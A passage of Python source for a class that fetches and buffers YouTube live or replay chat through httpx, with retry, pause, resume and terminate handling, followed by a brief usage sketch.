        # Start a loop task for _listen()
        self.listen_task = self._executor.submit(self._startlisten)
        # Register add_done_callback
        if self._done_callback is None:
            self.listen_task.add_done_callback(self._finish)
        else:
            self.listen_task.add_done_callback(self._done_callback)

    def _startlisten(self):
        """Fetch the first continuation parameter,
        then create and start the _listen loop.
        """
        time.sleep(0.1)  # sleep briefly to avoid skipping the first fetch
        initial_continuation = liveparam.getparam(self._video_id, 3)
        self._listen(initial_continuation)

    def _listen(self, continuation):
        ''' Fetch chat data and store it into the buffer,
        get the next continuation parameter, and loop.

        Parameter
        ---------
        continuation : str
            parameter for next chat data
        '''
        try:
            with httpx.Client(http2=True) as client:
                while (continuation and self._is_alive):
                    continuation = self._check_pause(continuation)
                    contents = self._get_contents(continuation, client,
                                                  headers)
                    metadata, chatdata = self._parser.parse(contents)
                    timeout = metadata['timeoutMs'] / 1000
                    chat_component = {
                        "video_id": self._video_id,
                        "timeout": timeout,
                        "chatdata": chatdata
                    }
                    time_mark = time.time()
                    if self._direct_mode:
                        processed_chat = self.processor.process(
                            [chat_component])
                        if isinstance(processed_chat, tuple):
                            self._callback(*processed_chat)
                        else:
                            self._callback(processed_chat)
                    else:
                        self._buffer.put(chat_component)
                    diff_time = timeout - (time.time() - time_mark)
                    self._event.wait(diff_time if diff_time > 0 else 0)
                    continuation = metadata.get('continuation')
        except exceptions.ChatParseException as e:
            self._logger.debug(f"[{self._video_id}]{str(e)}")
            raise
        except (TypeError, json.JSONDecodeError):
            self._logger.error(f"{traceback.format_exc(limit=-1)}")
            raise

        self._logger.debug(f"[{self._video_id}] finished fetching chat.")
        raise exceptions.ChatDataFinished

    def _check_pause(self, continuation):
        if self._pauser.empty():
            # pause: block until resume() puts an item back into _pauser.
            self._pauser.get()
            # resume: put None back into _pauser so later calls do not block.
            self._pauser.put_nowait(None)
            if not self._is_replay:
                continuation = liveparam.getparam(self._video_id, 3)
        return continuation

    def _get_contents(self, continuation, client, headers):
        '''Get 'continuationContents' from the livechat json.
        If contents is None on the first fetch,
        try to fetch archived chat data.

        Return:
        -------
            'continuationContents', which includes metadata & chat data.
        '''
        livechat_json = (self._get_livechat_json(continuation, client,
                                                 headers))
        contents = self._parser.get_contents(livechat_json)
        if self._first_fetch:
            if contents is None or self._is_replay:
                '''Try to fetch archive chat data.'''
                self._parser.is_replay = True
                self._fetch_url = "live_chat_replay/get_live_chat_replay?continuation="
                continuation = arcparam.getparam(self._video_id, self.seektime,
                                                 self._topchat_only)
                livechat_json = (self._get_livechat_json(
                    continuation, client, headers))
                reload_continuation = self._parser.reload_continuation(
                    self._parser.get_contents(livechat_json))
                if reload_continuation:
                    livechat_json = (self._get_livechat_json(
                        reload_continuation, client, headers))
                contents = self._parser.get_contents(livechat_json)
                self._is_replay = True
            self._first_fetch = False
        return contents

    def _get_livechat_json(self, continuation, client, headers):
        '''
        Get json which includes chat data.
        '''
        continuation = urllib.parse.quote(continuation)
        livechat_json = None
        url = f"https://www.youtube.com/{self._fetch_url}{continuation}&pbj=1"
        for _ in range(MAX_RETRY + 1):
            try:
                # The client is managed by the caller's `with` block in _listen,
                # so it must not be re-entered (and closed) here.
                livechat_json = client.get(url, headers=headers).json()
                break
            except (json.JSONDecodeError, httpx.HTTPError):
                time.sleep(2)
                continue
        else:
            self._logger.error(f"[{self._video_id}] Exceeded retry count.")
            raise exceptions.RetryExceedMaxCount()
        return livechat_json

    def _callback_loop(self, callback):
        """If a callback is specified in the constructor,
        pass processed chat data to the callback function
        at regular intervals in the background.

        Parameter
        ---------
        callback : func
            Function to which the processed chat data is passed.
        """
        while self.is_alive():
            items = self._buffer.get()
            processed_chat = self.processor.process(items)
            if isinstance(processed_chat, tuple):
                self._callback(*processed_chat)
            else:
                self._callback(processed_chat)

    def get(self):
        """
        Retrieves data from the buffer,
        passes it to the processor,
        and returns the processed chat data.

        Returns
        -------
            Chat data processed by the Processor.
        """
        if self._callback is None:
            if self.is_alive():
                items = self._buffer.get()
                return self.processor.process(items)
            else:
                return []
        raise exceptions.IllegalFunctionCall(
            "Callback parameter is already set, so get() cannot be performed.")

    def is_replay(self):
        return self._is_replay

    def pause(self):
        if self._callback is None:
            return
        if not self._pauser.empty():
            self._pauser.get()

    def resume(self):
        if self._callback is None:
            return
        if self._pauser.empty():
            self._pauser.put_nowait(None)

    def is_alive(self):
        return self._is_alive

    def _finish(self, sender):
        '''Called when the _listen() task finished.'''
        try:
            self._task_finished()
        except CancelledError:
            self._logger.debug(f'[{self._video_id}] cancelled:{sender}')

    def terminate(self):
        '''
        Terminate fetching chats.
        '''
        if self._pauser.empty():
            self._pauser.put_nowait(None)
        self._is_alive = False
        self._buffer.put({})
        self._event.set()
        self.processor.finalize()

    def _task_finished(self):
        if self.is_alive():
            self.terminate()
        try:
            self.listen_task.result()
        except Exception as e:
            self.exception = e
            if not isinstance(e, exceptions.ChatParseException):
                self._logger.error(f'Internal exception - {type(e)}{str(e)}')
        self._logger.info(f'[{self._video_id}] finished.')

    def raise_for_status(self):
        if self.exception is not None:
            raise self.exception
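
Finally, a hedged usage sketch for the class above, assuming LiveChat and its dependencies are importable as shown; "YOUR_VIDEO_ID" is a placeholder and the exact shape of the processed data depends on the configured ChatProcessor:

import time

# Hypothetical usage: poll the buffer until the stream ends.
chat = LiveChat(video_id="YOUR_VIDEO_ID")
try:
    while chat.is_alive():
        data = chat.get()   # processed chat data pulled from the buffer
        print(data)         # shape depends on the ChatProcessor in use
        time.sleep(1)
except KeyboardInterrupt:
    chat.terminate()
chat.raise_for_status()     # re-raise any exception captured by the listener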